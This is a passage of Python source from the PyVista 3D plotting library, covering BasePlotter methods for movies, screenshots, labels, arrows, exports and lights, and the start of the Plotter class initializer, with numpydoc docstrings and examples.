and set the quality to maximum. >>> import pyvista >>> pl = pyvista.Plotter >>> pl.open_movie('movie.mp4', quality=10) # doctest:+SKIP """ from imageio import get_writer if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) self.mwriter = get_writer(filename, fps=framerate, quality=quality, **kwargs) def open_gif(self, filename): """Open a gif file. Parameters ---------- filename : str Filename of the gif to open. Filename must end in ``"gif"``. Examples -------- Open a gif file. >>> import pyvista >>> pl = pyvista.Plotter >>> pl.open_gif('movie.gif') # doctest:+SKIP """ from imageio import get_writer if filename[-3:] != 'gif': raise ValueError('Unsupported filetype. Must end in .gif') if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) self._gif_filename = os.path.abspath(filename) self.mwriter = get_writer(filename, mode='I') def write_frame(self): """Write a single frame to the movie file. Examples -------- >>> import pyvista >>> plotter = pyvista.Plotter() >>> plotter.open_movie(filename) # doctest:+SKIP >>> plotter.add_mesh(pyvista.Sphere()) # doctest:+SKIP >>> plotter.write_frame() # doctest:+SKIP See :ref:`movie_example` for a full example using this method. """ # if off screen, show has not been called and we must render # before extracting an image if self._first_time: self._on_first_render_request() self.render() if not hasattr(self, 'mwriter'): raise RuntimeError('This plotter has not opened a movie or GIF file.') self.update() self.mwriter.append_data(self.image) def _run_image_filter(self, ifilter): # Update filter and grab pixels ifilter.Modified() ifilter.Update() image = pyvista.wrap(ifilter.GetOutput()) img_size = image.dimensions img_array = pyvista.utilities.point_array(image, 'ImageScalars') # Reshape and write tgt_size = (img_size[1], img_size[0], -1) return img_array.reshape(tgt_size)[::-1] def get_image_depth(self, fill_value=np.nan, reset_camera_clipping_range=True): """Return a depth image representing current render window. Parameters ---------- fill_value : float, optional Fill value for points in image that do not include objects in scene. To not use a fill value, pass ``None``. reset_camera_clipping_range : bool, optional Reset the camera clipping range to include data in view. Returns ------- numpy.ndarray Image of depth values from camera orthogonal to image plane. Notes ----- Values in image_depth are negative to adhere to a right-handed coordinate system. Examples -------- >>> import pyvista >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(pyvista.Sphere()) >>> plotter.store_image = True >>> plotter.show() >>> zval = plotter.get_image_depth() """ # allow no render window if not hasattr(self, 'ren_win') and self.last_image_depth is not None: zval = self.last_image_depth.copy() if fill_value is not None: zval[self._image_depth_null] = fill_value return zval self._check_rendered() self._check_has_ren_win() # Ensure points in view are within clipping range of renderer? if reset_camera_clipping_range: self.renderer.ResetCameraClippingRange() # Get the z-buffer image ifilter = _vtk.vtkWindowToImageFilter() ifilter.SetInput(self.ren_win) ifilter.ReadFrontBufferOff() ifilter.SetInputBufferTypeToZBuffer() zbuff = self._run_image_filter(ifilter)[:, :, 0] # Convert z-buffer values to depth from camera with warnings.catch_warnings(): warnings.filterwarnings('ignore') near, far = self.camera.clipping_range if self.camera.parallel_projection: zval = (zbuff - near) / (far - near) else: zval = 2 * near * far / ((zbuff - 0.5) * 2 * (far - near) - near - far) # Consider image values outside clipping range as nans self._image_depth_null = np.logical_or(zval < -far, np.isclose(zval, -far)) if fill_value is not None: zval[self._image_depth_null] = fill_value return zval def add_lines(self, lines, color='w', width=5, label=None, name=None): """Add lines to the plotting object. Parameters ---------- lines : np.ndarray or pyvista.PolyData Points representing line segments. For example, two line segments would be represented as ``np.array([[0, 0, 0], [1, 0, 0], [1, 0, 0], [1, 1, 0]])``. color : color_like, optional Either a string, rgb list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` width : float, optional Thickness of lines. label : str, optional String label to use when adding a legend to the scene with :func:`pyvista.BasePlotter.add_legend`. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. Returns ------- vtk.vtkActor Lines actor. Examples -------- >>> import numpy as np >>> import pyvista >>> pl = pyvista.Plotter() >>> points = np.array([[0, 1, 0], [1, 0, 0], [1, 1, 0], [2, 0, 0]]) >>> actor = pl.add_lines(points, color='yellow', width=3) >>> pl.camera_position = 'xy' >>> pl.show() """ if not isinstance(lines, np.ndarray): raise TypeError('Input should be an array of point segments') lines = pyvista.lines_from_points(lines) # Create mapper and add lines mapper = _vtk.vtkDataSetMapper() mapper.SetInputData(lines) rgb_color = Color(color) # Create actor actor = _vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().SetLineWidth(width) actor.GetProperty().EdgeVisibilityOn() actor.GetProperty().SetEdgeColor(rgb_color.float_rgb) actor.GetProperty().SetColor(rgb_color.float_rgb) actor.GetProperty().LightingOff() # legend label if label: if not isinstance(label, str): raise TypeError('Label must be a string') addr = actor.GetAddressAsString("") self.renderer._labels[addr] = [lines, label, rgb_color] # Add to renderer self.add_actor(actor, reset_camera=False, name=name, pickable=False) return actor @wraps(ScalarBars.remove_scalar_bar) def remove_scalar_bar(self, *args, **kwargs): """Remove the active scalar bar.""" self.scalar_bars.remove_scalar_bar(*args, **kwargs) def add_point_labels( self, points, labels, italic=False, bold=True, font_size=None, text_color=None, font_family=None, shadow=False, show_points=True, point_color=None, point_size=5, name=None, shape_color='grey', shape='rounded_rect', fill_shape=True, margin=3, shape_opacity=1.0, pickable=False, render_points_as_spheres=False, tolerance=0.001, reset_camera=None, always_visible=False, render=True, ): """Create a point actor with one label from list labels assigned to each point. Parameters ---------- points : sequence or pyvista.DataSet An ``n x 3`` sequence points or pyvista dataset with points. labels : list or str List of labels. Must be the same length as points. If a string name is given with a :class:`pyvista.DataSet` input for points, then these are fetched. italic : bool, optional Italicises title and bar labels. Default ``False``. bold : bool, optional Bolds title and bar labels. Default ``True``. font_size : float, optional Sets the size of the title font. Defaults to 16. text_color : color_like, optional Color of text. Either a string, RGB sequence, or hex color string. * ``text_color='white'`` * ``text_color='w'`` * ``text_color=[1.0, 1.0, 1.0]`` * ``text_color='#FFFFFF'`` font_family : str, optional Font family. Must be either ``'courier'``, ``'times'``, or ``'arial``. shadow : bool, optional Adds a black shadow to the text. Defaults to ``False``. show_points : bool, optional Controls if points are visible. Default ``True``. point_color : color_like, optional Either a string, rgb list, or hex color string. One of the following. * ``point_color='white'`` * ``point_color='w'`` * ``point_color=[1.0, 1.0, 1.0]`` * ``point_color='#FFFFFF'`` point_size : float, optional Size of points if visible. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. shape_color : color_like, optional Color of points (if visible). Either a string, rgb sequence, or hex color string. shape : str, optional The string name of the shape to use. Options are ``'rect'`` or ``'rounded_rect'``. If you want no shape, pass ``None``. fill_shape : bool, optional Fill the shape with the ``shape_color``. Outlines if ``False``. margin : int, optional The size of the margin on the label background shape. Default is 3. shape_opacity : float, optional The opacity of the shape in the range of ``[0, 1]``. pickable : bool, optional Set whether this actor is pickable. render_points_as_spheres : bool, optional Render points as spheres rather than dots. tolerance : float, optional A tolerance to use to determine whether a point label is visible. A tolerance is usually required because the conversion from world space to display space during rendering introduces numerical round-off. reset_camera : bool, optional Reset the camera after adding the points to the scene. always_visible : bool, optional Skip adding the visibility filter. Default False. render : bool, optional Force a render when ``True`` (default). Returns ------- vtk.vtkActor2D VTK label actor. Can be used to change properties of the labels. Examples -------- >>> import numpy as np >>> import pyvista >>> pl = pyvista.Plotter() >>> points = np.array([[0.0, 0.0, 0.0], ... [1.0, 1.0, 0.0], ... [2.0, 0.0, 0.0]]) >>> labels = ['Point A', 'Point B', 'Point C'] >>> actor = pl.add_point_labels(points, labels, italic=True, font_size=20, ... point_color='red', point_size=20, ... render_points_as_spheres=True, ... always_visible=True, shadow=True) >>> pl.camera_position = 'xy' >>> pl.show() """ if font_family is None: font_family = self._theme.font.family if font_size is None: font_size = self._theme.font.size point_color = Color(point_color, default_color=self._theme.color) if isinstance(points, (list, tuple)): points = np.array(points) if isinstance(points, np.ndarray): vtkpoints = pyvista.PolyData(points) # Cast to poly data elif is_pyvista_dataset(points): vtkpoints = pyvista.PolyData(points.points) if isinstance(labels, str): labels = points.point_data[labels] else: raise TypeError(f'Points type not usable: {type(points)}') if len(vtkpoints.points) != len(labels): raise ValueError('There must be one label for each point') if name is None: name = f'{type(vtkpoints).__name__}({vtkpoints.memory_address})' vtklabels = _vtk.vtkStringArray() vtklabels.SetName('labels') for item in labels: vtklabels.InsertNextValue(str(item)) vtkpoints.GetPointData().AddArray(vtklabels) # Create hierarchy hier = _vtk.vtkPointSetToLabelHierarchy() hier.SetLabelArrayName('labels') if always_visible: hier.SetInputData(vtkpoints) else: # Only show visible points vis_points = _vtk.vtkSelectVisiblePoints() vis_points.SetInputData(vtkpoints) vis_points.SetRenderer(self.renderer) vis_points.SetTolerance(tolerance) hier.SetInputConnection(vis_points.GetOutputPort()) # create label mapper labelMapper = _vtk.vtkLabelPlacementMapper() labelMapper.SetInputConnection(hier.GetOutputPort()) if not isinstance(shape, str): labelMapper.SetShapeToNone() elif shape.lower() in 'rect': labelMapper.SetShapeToRect() elif shape.lower() in 'rounded_rect': labelMapper.SetShapeToRoundedRect() else: raise ValueError(f'Shape ({shape}) not understood') if fill_shape: labelMapper.SetStyleToFilled() else: labelMapper.SetStyleToOutline() labelMapper.SetBackgroundColor(Color(shape_color).float_rgb) labelMapper.SetBackgroundOpacity(shape_opacity) labelMapper.SetMargin(margin) textprop = hier.GetTextProperty() textprop.SetItalic(italic) textprop.SetBold(bold) textprop.SetFontSize(font_size) textprop.SetFontFamily(parse_font_family(font_family)) textprop.SetColor(Color(text_color, default_color=self._theme.font.color).float_rgb) textprop.SetShadow(shadow) self.remove_actor(f'{name}-points', reset_camera=False) self.remove_actor(f'{name}-labels', reset_camera=False) # add points if show_points: self.add_mesh( vtkpoints, color=point_color, point_size=point_size, name=f'{name}-points', pickable=pickable, render_points_as_spheres=render_points_as_spheres, reset_camera=reset_camera, render=render, ) label_actor = _vtk.vtkActor2D() label_actor.SetMapper(labelMapper) self.add_actor(label_actor, reset_camera=False, name=f'{name}-labels', pickable=False) return label_actor def add_point_scalar_labels(self, points, labels, fmt=None, preamble='', **kwargs): """Label the points from a dataset with the values of their scalars. Wrapper for :func:`pyvista.BasePlotter.add_point_labels`. Parameters ---------- points : numpy.ndarray or pyvista.DataSet An ``n x 3`` numpy.ndarray or pyvista dataset with points. labels : str, optional String name of the point data array to use. fmt : str, optional String formatter used to format numerical data. preamble : str, optional Text before the start of each label. **kwargs : dict, optional Keyword arguments passed to :func:`pyvista.BasePlotter.add_point_labels`. Returns ------- vtk.vtkActor2D VTK label actor. Can be used to change properties of the labels. """ if not is_pyvista_dataset(points): raise TypeError(f'input points must be a pyvista dataset, not: {type(points)}') if not isinstance(labels, str): raise TypeError('labels must be a string name of the scalars array to use') if fmt is None: fmt = self._theme.font.fmt if fmt is None: fmt = '%.6e' scalars = points.point_data[labels] phrase = f'{preamble} %.3e' labels = [phrase % val for val in scalars] return self.add_point_labels(points, labels, **kwargs) def add_points(self, points, **kwargs): """Add points to a mesh. Parameters ---------- points : numpy.ndarray or pyvista.DataSet Array of points or the points from a pyvista object. **kwargs : dict, optional See :func:`pyvista.BasePlotter.add_mesh` for optional keyword arguments. Returns ------- vtk.vtkActor Actor of the mesh. Examples -------- Add a numpy array of points to a mesh. >>> import numpy as np >>> import pyvista >>> points = np.random.random((10, 3)) >>> pl = pyvista.Plotter() >>> actor = pl.add_points(points, render_points_as_spheres=True, ... point_size=100.0) >>> pl.show() """ kwargs['style'] = 'points' return self.add_mesh(points, **kwargs) def add_arrows(self, cent, direction, mag=1, **kwargs): """Add arrows to the plotter. Parameters ---------- cent : np.ndarray Array of centers. direction : np.ndarray Array of direction vectors. mag : float, optional Amount to scale the direction vectors. **kwargs : dict, optional See :func:`pyvista.BasePlotter.add_mesh` for optional keyword arguments. Returns ------- vtk.vtkActor VTK actor of the arrows. Examples -------- Plot a random field of vectors and save a screenshot of it. >>> import numpy as np >>> import pyvista >>> cent = np.random.random((10, 3)) >>> direction = np.random.random((10, 3)) >>> plotter = pyvista.Plotter() >>> _ = plotter.add_arrows(cent, direction, mag=2) >>> plotter.show() """ if cent.shape != direction.shape: # pragma: no cover raise ValueError('center and direction arrays must have the same shape') direction = direction.copy() if cent.ndim != 2: cent = cent.reshape((-1, 3)) if direction.ndim != 2: direction = direction.reshape((-1, 3)) if mag != 1: direction = direction * mag pdata = pyvista.vector_poly_data(cent, direction) # Create arrow object arrow = _vtk.vtkArrowSource() arrow.Update() glyph3D = _vtk.vtkGlyph3D() glyph3D.SetSourceData(arrow.GetOutput()) glyph3D.SetInputData(pdata) glyph3D.SetVectorModeToUseVector() glyph3D.Update() arrows = wrap(glyph3D.GetOutput()) return self.add_mesh(arrows, **kwargs) @staticmethod def _save_image(image, filename, return_img): """Save to file and/or return a NumPy image array. This is an internal helper. """ if not image.size: raise ValueError('Empty image. Have you run plot() first?') # write screenshot to file if requested if isinstance(filename, (str, pathlib.Path, io.BytesIO)): from PIL import Image if isinstance(filename, (str, pathlib.Path)): filename = pathlib.Path(filename) if isinstance(pyvista.FIGURE_PATH, str) and not filename.is_absolute(): filename = pathlib.Path(os.path.join(pyvista.FIGURE_PATH, filename)) if not filename.suffix: filename = filename.with_suffix('.png') elif filename.suffix not in SUPPORTED_FORMATS: raise ValueError( f'Unsupported extension {filename.suffix}\n' f'Must be one of the following: {SUPPORTED_FORMATS}' ) filename = os.path.abspath(os.path.expanduser(str(filename))) Image.fromarray(image).save(filename) else: Image.fromarray(image).save(filename, format="PNG") # return image array if requested if return_img: return image def save_graphic(self, filename, title='PyVista Export', raster=True, painter=True): """Save a screenshot of the rendering window as a graphic file. This can be helpful for publication documents. The supported formats are: * ``'.svg'`` * ``'.eps'`` * ``'.ps'`` * ``'.pdf'`` * ``'.tex'`` Parameters ---------- filename : str Path to fsave the graphic file to. title : str, optional Title to use within the file properties. raster : bool, optional Attempt to write 3D properties as a raster image. painter : bool, optional Configure the exporter to expect a painter-ordered 2D rendering, that is, a rendering at a fixed depth where primitives are drawn from the bottom up. Examples -------- >>> import pyvista >>> from pyvista import examples >>> pl = pyvista.Plotter() >>> _ = pl.add_mesh(examples.load_airplane(), smooth_shading=True) >>> _ = pl.add_background_image(examples.mapfile) >>> pl.save_graphic("img.svg") # doctest:+SKIP """ if not hasattr(self, 'ren_win'): raise AttributeError('This plotter is closed and unable to save a screenshot.') if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) filename = os.path.abspath(os.path.expanduser(filename)) extension = pyvista.fileio.get_ext(filename) writer = _vtk.lazy_vtkGL2PSExporter() modes = { '.svg': writer.SetFileFormatToSVG, '.eps': writer.SetFileFormatToEPS, '.ps': writer.SetFileFormatToPS, '.pdf': writer.SetFileFormatToPDF, '.tex': writer.SetFileFormatToTeX, } if extension not in modes: raise ValueError( f"Extension ({extension}) is an invalid choice.\n\n" f"Valid options include: {', '.join(modes.keys())}" ) writer.CompressOff() writer.SetFilePrefix(filename.replace(extension, '')) writer.SetInput(self.ren_win) modes[extension]() writer.SetTitle(title) writer.SetWrite3DPropsAsRasterImage(raster) if painter: writer.UsePainterSettings() writer.Update() def screenshot( self, filename=None, transparent_background=None, return_img=True, window_size=None ): """Take screenshot at current camera position. Parameters ---------- filename : str, pathlib.Path, BytesIO, optional Location to write image to. If ``None``, no image is written. transparent_background : bool, optional Whether to make the background transparent. The default is looked up on the plotter's theme. return_img : bool, optional If ``True`` (the default), a NumPy array of the image will be returned. window_size : 2-length tuple, optional Set the plotter's size to this ``(width, height)`` before taking the screenshot. Returns ------- numpy.ndarray Array containing pixel RGB and alpha. Sized: * [Window height x Window width x 3] if ``transparent_background`` is set to ``False``. * [Window height x Window width x 4] if ``transparent_background`` is set to ``True``. Examples -------- >>> import pyvista >>> sphere = pyvista.Sphere() >>> plotter = pyvista.Plotter(off_screen=True) >>> actor = plotter.add_mesh(sphere) >>> plotter.screenshot('screenshot.png') # doctest:+SKIP """ if window_size is not None: self.window_size = window_size # configure image filter if transparent_background is None: transparent_background = self._theme.transparent_background self.image_transparent_background = transparent_background # This if statement allows you to save screenshots of closed plotters # This is needed for the sphinx-gallery to work if not hasattr(self, 'ren_win'): # If plotter has been closed... # check if last_image exists if self.last_image is not None: # Save last image return self._save_image(self.last_image, filename, return_img) # Plotter hasn't been rendered or was improperly closed raise RuntimeError('This plotter is closed and unable to save a screenshot.') if self._first_time and not self.off_screen: raise RuntimeError( "Nothing to screenshot - call .show first or use the off_screen argument" ) # if off screen, show has not been called and we must render # before extracting an image if self._first_time: self._on_first_render_request() self.render() return self._save_image(self.image, filename, return_img) @wraps(Renderers.set_background) def set_background(self, *args, **kwargs): """Wrap ``Renderers.set_background``.""" self.renderers.set_background(*args, **kwargs) def generate_orbital_path(self, factor=3.0, n_points=20, viewup=None, shift=0.0): """Generate an orbital path around the data scene. Parameters ---------- factor : float, optional A scaling factor when building the orbital extent. n_points : int, optional Number of points on the orbital path. viewup : list(float), optional The normal to the orbital plane. shift : float, optional Shift the plane up/down from the center of the scene by this amount. Returns ------- pyvista.PolyData PolyData containing the orbital path. Examples -------- Generate an orbital path around a sphere. >>> import pyvista >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(pyvista.Sphere()) >>> viewup = [0, 0, 1] >>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=50, ... shift=0.0, viewup=viewup) See :ref:`orbiting_example` for a full example using this method. """ if viewup is None: viewup = self._theme.camera['viewup'] center = np.array(self.center) bnds = np.array(self.bounds) radius = (bnds[1] - bnds[0]) * factor y = (bnds[3] - bnds[2]) * factor if y > radius: radius = y center += np.array(viewup) * shift return pyvista.Polygon(center=center, radius=radius, normal=viewup, n_sides=n_points) def fly_to(self, point): """Move the current camera's focal point to a position point. The movement is animated over the number of frames specified in NumberOfFlyFrames. The LOD desired frame rate is used. Parameters ---------- point : sequence Point to fly to in the form of ``(x, y, z)``. """ self.iren.fly_to(self.renderer, point) def orbit_on_path( self, path=None, focus=None, step=0.5, viewup=None, write_frames=False, threaded=False, progress_bar=False, ): """Orbit on the given path focusing on the focus point. Parameters ---------- path : pyvista.PolyData Path of orbital points. The order in the points is the order of travel. focus : list(float) of length 3, optional The point of focus the camera. step : float, optional The timestep between flying to each camera position. viewup : list(float), optional The normal to the orbital plane. write_frames : bool, optional Assume a file is open and write a frame on each camera view during the orbit. threaded : bool, optional Run this as a background thread. Generally used within a GUI (i.e. PyQt). progress_bar : bool, optional Show the progress bar when proceeding through the path. This can be helpful to show progress when generating movies with ``off_screen=True``. Examples -------- Plot an orbit around the earth. Save the gif as a temporary file. >>> import tempfile >>> import os >>> import pyvista >>> filename = os.path.join(tempfile._get_default_tempdir(), ... next(tempfile._get_candidate_names()) + '.gif') >>> from pyvista import examples >>> plotter = pyvista.Plotter(window_size=[300, 300]) >>> _ = plotter.add_mesh(examples.load_globe(), smooth_shading=True) >>> plotter.open_gif(filename) >>> viewup = [0, 0, 1] >>> orbit = plotter.generate_orbital_path(factor=2.0, n_points=24, ... shift=0.0, viewup=viewup) >>> plotter.orbit_on_path(orbit, write_frames=True, viewup=viewup, ... step=0.02) See :ref:`orbiting_example` for a full example using this method. """ if focus is None: focus = self.center if viewup is None: viewup = self._theme.camera['viewup'] if path is None: path = self.generate_orbital_path(viewup=viewup) if not is_pyvista_dataset(path): path = pyvista.PolyData(path) points = path.points # Make sure the whole scene is visible self.camera.thickness = path.length if progress_bar: try: from tqdm import tqdm except ImportError: # pragma: no cover raise ImportError("Please install `tqdm` to use ``progress_bar=True``") def orbit(): """Define the internal thread for running the orbit.""" if progress_bar: points_seq = tqdm(points) else: points_seq = points for point in points_seq: tstart = time.time() # include the render time in the step time self.set_position(point, render=False) self.set_focus(focus, render=False) self.set_viewup(viewup, render=False) self.renderer.ResetCameraClippingRange() if write_frames: self.write_frame() else: self.render() sleep_time = step - (time.time() - tstart) if sleep_time > 0: time.sleep(sleep_time) if write_frames: self.mwriter.close() if threaded: thread = Thread(target=orbit) thread.start() else: orbit() def export_vtkjs(self, filename, compress_arrays=False): """Export the current rendering scene as a VTKjs scene. It can be used for rendering in a web browser. Parameters ---------- filename : str Filename to export the scene to. A filename extension of ``'.vtkjs'`` will be added. compress_arrays : bool, optional Enable array compression. Examples -------- >>> import pyvista >>> from pyvista import examples >>> pl = pyvista.Plotter() >>> _ = pl.add_mesh(examples.load_hexbeam()) >>> pl.export_vtkjs("sample") # doctest:+SKIP """ if not hasattr(self, 'ren_win'): raise RuntimeError('Export must be called before showing/closing the scene.') if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) else: filename = os.path.abspath(os.path.expanduser(filename)) export_plotter_vtkjs(self, filename, compress_arrays=compress_arrays) def export_obj(self, filename): """Export scene to OBJ format. Parameters ---------- filename : str Filename to export the scene to. Should end in ``'.obj'``. Returns ------- vtkOBJExporter Object exporter. """ # lazy import vtkOBJExporter here as it takes a long time to # load and is not always used try: from vtkmodules.vtkIOExport import vtkOBJExporter except: # noqa: E722 from vtk import vtkOBJExporter if not hasattr(self, "ren_win"): raise RuntimeError("This plotter must still have a render window open.") if isinstance(pyvista.FIGURE_PATH, str) and not os.path.isabs(filename): filename = os.path.join(pyvista.FIGURE_PATH, filename) else: filename = os.path.abspath(os.path.expanduser(filename)) exporter = vtkOBJExporter() exporter.SetFilePrefix(filename) exporter.SetRenderWindow(self.ren_win) return exporter.Write() def __del__(self): """Delete the plotter.""" # We have to check here if it has the closed attribute as it # may not exist should the plotter have failed to initialize. if hasattr(self, '_closed'): if not self._closed: self.close() self.deep_clean() if hasattr(self, 'renderers'): del self.renderers def add_background_image(self, image_path, scale=1, auto_resize=True, as_global=True): """Add a background image to a plot. Parameters ---------- image_path : str Path to an image file. scale : float, optional Scale the image larger or smaller relative to the size of the window. For example, a scale size of 2 will make the largest dimension of the image twice as large as the largest dimension of the render window. Defaults to 1. auto_resize : bool, optional Resize the background when the render window changes size. as_global : bool, optional When multiple render windows are present, setting ``as_global=False`` will cause the background to only appear in one window. Examples -------- >>> import pyvista >>> from pyvista import examples >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(pyvista.Sphere()) >>> plotter.add_background_image(examples.mapfile) >>> plotter.show() """ if self.renderers.has_active_background_renderer: raise RuntimeError( 'A background image already exists. ' 'Remove it with ``remove_background_image`` ' 'before adding one' ) # Need to change the number of layers to support an additional # background layer if not self._has_background_layer: self.ren_win.SetNumberOfLayers(3) renderer = self.renderers.add_background_renderer(image_path, scale, as_global) self.ren_win.AddRenderer(renderer) # set up autoscaling of the image if auto_resize: # pragma: no cover self.iren.add_observer('ModifiedEvent', renderer.resize) @wraps(Renderers.remove_background_image) def remove_background_image(self): """Wrap ``Renderers.remove_background_image``.""" self.renderers.remove_background_image() # return the active renderer to the top, otherwise flat background # will not be rendered self.renderer.layer = 0 def _on_first_render_request(self, cpos=None): """Once an image or render is officially requested, run this routine. For example on the show call or any screenshot producing code. """ # reset unless camera for the first render unless camera is set if self._first_time: # and not self.camera_set: for renderer in self.renderers: if not renderer.camera_set and cpos is None: renderer.camera_position = renderer.get_default_cam_pos() renderer.ResetCamera() elif cpos is not None: renderer.camera_position = cpos self._first_time = False def reset_camera_clipping_range(self): """Reset camera clipping planes.""" self.renderer.ResetCameraClippingRange() def add_light(self, light, only_active=False): """Add a Light to the scene. Parameters ---------- light : Light or vtkLight The light to be added. only_active : bool, optional If ``True``, only add the light to the active renderer. The default is that every renderer adds the light. To add the light to an arbitrary renderer, see :func:`pyvista.plotting.renderer.Renderer.add_light`. Examples -------- Create a plotter that we initialize with no lights, and add a cube and a single headlight to it. >>> import pyvista as pv >>> plotter = pv.Plotter(lighting='none') >>> _ = plotter.add_mesh(pv.Cube()) >>> light = pv.Light(color='cyan', light_type='headlight') >>> plotter.add_light(light) >>> plotter.show() """ renderers = [self.renderer] if only_active else self.renderers for renderer in renderers: renderer.add_light(light) def remove_all_lights(self, only_active=False): """Remove all lights from the scene. Parameters ---------- only_active : bool If ``True``, only remove lights from the active renderer. The default is that lights are stripped from every renderer. Examples -------- Create a plotter and remove all lights after initialization. Note how the mesh rendered is completely flat >>> import pyvista as pv >>> plotter = pv.Plotter() >>> plotter.remove_all_lights() >>> plotter.renderer.lights [] >>> _ = plotter.add_mesh(pv.Sphere(), show_edges=True) >>> plotter.show() Note how this differs from a plot with default lighting >>> pv.Sphere().plot(show_edges=True, lighting=True) """ renderers = [self.renderer] if only_active else self.renderers for renderer in renderers: renderer.remove_all_lights() def where_is(self, name): """Return the subplot coordinates of a given actor. Parameters ---------- name : str Actor's name. Returns ------- list(tuple(int)) A list with the subplot coordinates of the actor. Examples -------- >>> import pyvista as pv >>> plotter = pv.Plotter(shape=(2, 2)) >>> plotter.subplot(0, 0) >>> _ = plotter.add_mesh(pv.Box(), name='box') >>> plotter.subplot(0, 1) >>> _ = plotter.add_mesh(pv.Sphere(), name='sphere') >>> plotter.subplot(1, 0) >>> _ = plotter.add_mesh(pv.Box(), name='box') >>> plotter.subplot(1, 1) >>> _ = plotter.add_mesh(pv.Cone(), name='cone') >>> plotter.where_is('box') [(0, 0), (1, 0)] >>> plotter.show() """ places = [] for index in range(len(self.renderers)): if name in self.renderers[index]._actors: places.append(tuple(self.renderers.index_to_loc(index))) return places class Plotter(BasePlotter): """Plotting object to display vtk meshes or numpy arrays. Parameters ---------- off_screen : bool, optional Renders off screen when ``True``. Useful for automated screenshots. notebook : bool, optional When ``True``, the resulting plot is placed inline a jupyter notebook. Assumes a jupyter console is active. Automatically enables ``off_screen``. shape : list or tuple, optional Number of sub-render windows inside of the main window. Specify two across with ``shape=(2, 1)`` and a two by two grid with ``shape=(2, 2)``. By default there is only one render window. Can also accept a string descriptor as shape. E.g.: * ``shape="3|1"`` means 3 plots on the left and 1 on the right, * ``shape="4/2"`` means 4 plots on top and 2 at the bottom. border : bool, optional Draw a border around each render window. Default ``False``. border_color : color_like, optional Either a string, rgb list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` window_size : list, optional Window size in pixels. Defaults to ``[1024, 768]``, unless set differently in the relevant theme's ``window_size`` property. multi_samples : int, optional The number of multi-samples used to mitigate aliasing. 4 is a good default but 8 will have better results with a potential impact on performance. line_smoothing : bool, optional If ``True``, enable line smoothing. polygon_smoothing : bool, optional If ``True``, enable polygon smoothing. lighting : str, optional What lighting to set up for the plotter. Accepted options: * ``'light_kit'``: a vtk Light Kit composed of 5 lights. * ``'three lights'``: illumination using 3 lights. * ``'none'``: no light sources at instantiation. The default is a ``'light_kit'`` (to be precise, 5 separate lights that act like a Light Kit). theme : pyvista.themes.DefaultTheme, optional Plot-specific theme. Examples -------- >>> import pyvista >>> from pyvista import examples >>> mesh = examples.load_hexbeam() >>> another_mesh = examples.load_uniform() >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(mesh, color='red') >>> actor = plotter.add_mesh(another_mesh, color='blue') >>> plotter.show() """ last_update_time = 0.0 right_timer_id = -1 def __init__( self, off_screen=None, notebook=None, shape=(1, 1), groups=None, row_weights=None, col_weights=None, border=None, border_color='k', border_width=2.0, window_size=None, multi_samples=None, line_smoothing=False, point_smoothing=False, polygon_smoothing=False, splitting_position=None, title=None, lighting='light kit', theme=None, ): """Initialize a vtk plotting object.""" super().__init__( shape=shape, border=border, border_color=border_color, border_width=border_width, groups=groups, row_weights=row_weights, col_weights=col_weights, splitting_position=splitting_position, title=title, lighting=lighting, theme=theme, ) log.debug('Plotter init start') # check if a plotting backend is enabled _warn_xserver() def on_timer(iren, event_id): """Exit application if interactive renderer stops.""" if event_id == 'TimerEvent' and self.iren._style != "Context": self.iren.terminate_app() if off_screen is None: off_screen = pyvista.OFF_SCREEN if notebook is None: if self._theme.notebook is not None: notebook = self._theme.notebook else: notebook = scooby.in_ipykernel() self.notebook = notebook if self.notebook: off_screen = True self.off_screen = off_screen self._window_size_unset = False if window_size is None: self._window_size_unset = True window_size = self._theme.window_size self.__prior_window_size = window_size if multi_samples is None: multi_samples = self._theme.multi_samples # initialize render window self.ren_win = _vtk.vtkRenderWindow() self.ren_win.SetMultiSamples(multi_samples) self.ren_win.SetBorders(True) if line_smoothing: self.ren_win.LineSmoothingOn() if point_smoothing: self.ren_win.PointSmoothingOn() if polygon_smoothing: self.ren_win.PolygonSmoothingOn() for renderer in self.renderers: self.ren_win.AddRenderer(renderer) # Add the shadow renderer to allow us to capture interactions within # a given viewport # https://vtk.org/pipermail/vtkusers/2018-June/102030.html number_or_layers = self.ren_win.GetNumberOfLayers() current_layer = self.renderer.GetLayer() self.ren_win.SetNumberOfLayers(number_or_layers + 1) self.ren_win.AddRenderer(self.renderers.shadow_renderer) self.renderers.shadow_renderer.SetLayer(current_layer + 1) self.renderers.shadow_renderer.SetInteractive(False) # never needs to capture if self.off_screen: self.ren_win.SetOffScreenRendering(1) # vtkGenericRenderWindowInteractor has no event loop and # allows the display client to close on Linux when # off_screen. We still want an interactor for off screen # plotting since there are some widgets (like the axes # widget) that need an interactor interactor = _vtk.vtkGenericRenderWindowInteractor() else: interactor = None # Add ren win and interactor self.iren = RenderWindowInteractor(self, light_follow_camera=False, interactor=interactor) self.iren.set_render_window(self.ren_win) self.enable_trackball_style() # internally calls update_style() self.iren.add_observer("KeyPressEvent", self.key_press_event) # Set camera widget based on theme. This requires that an # interactor be present. if self.theme._enable_camera_orientation_widget: self.add_camera_orientation_widget() # Set background self.set_background(self._theme.background) # Set window size self.window_size = window_size # add timer event if interactive render exists self.iren.add_observer(_vtk.vtkCommand.TimerEvent, on_timer) if 